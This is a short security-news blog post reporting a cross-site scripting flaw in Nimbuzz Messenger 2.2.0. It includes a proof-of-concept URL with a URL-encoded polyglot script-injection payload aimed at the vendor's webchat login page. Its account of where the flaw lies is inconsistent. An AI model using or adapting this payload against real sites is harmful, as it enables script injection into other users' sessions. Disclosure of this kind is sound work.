Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Home Cross Site Scripting vulnerability in Nimbuzz 2.2.0 Messenger
Vulnerability Web Application Vulnerability XSS Vulnerability

Cross Site Scripting vulnerability in Nimbuzz 2.2.0 Messenger

Monday, April 09, 2012

Grey Hat hacker "Sony" has discovered Cross Site Scripting vulnerability in Nimbuzz Messenger.  According to his report, the Nimbuzz version 2.2.0 is vulnerable to XSS.

Hacker found vulnerability in the Chat Window-->View in Browser. (persistent code). The 'forget password' page is found to be vulnerable to XSS.

Vulnerable Link:
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error

Poc:
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

Screenshot:
Tags: Vulnerability Web Application Vulnerability XSS Vulnerability
Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability

No Related Post Found

Also Read

Google to Introduce QR Codes for Gmail 2FA Amid Rising Security Concerns

 Google is set to introduce QR codes as a replacement for SMS-based two-factor authentication (2FA) codes for Gmail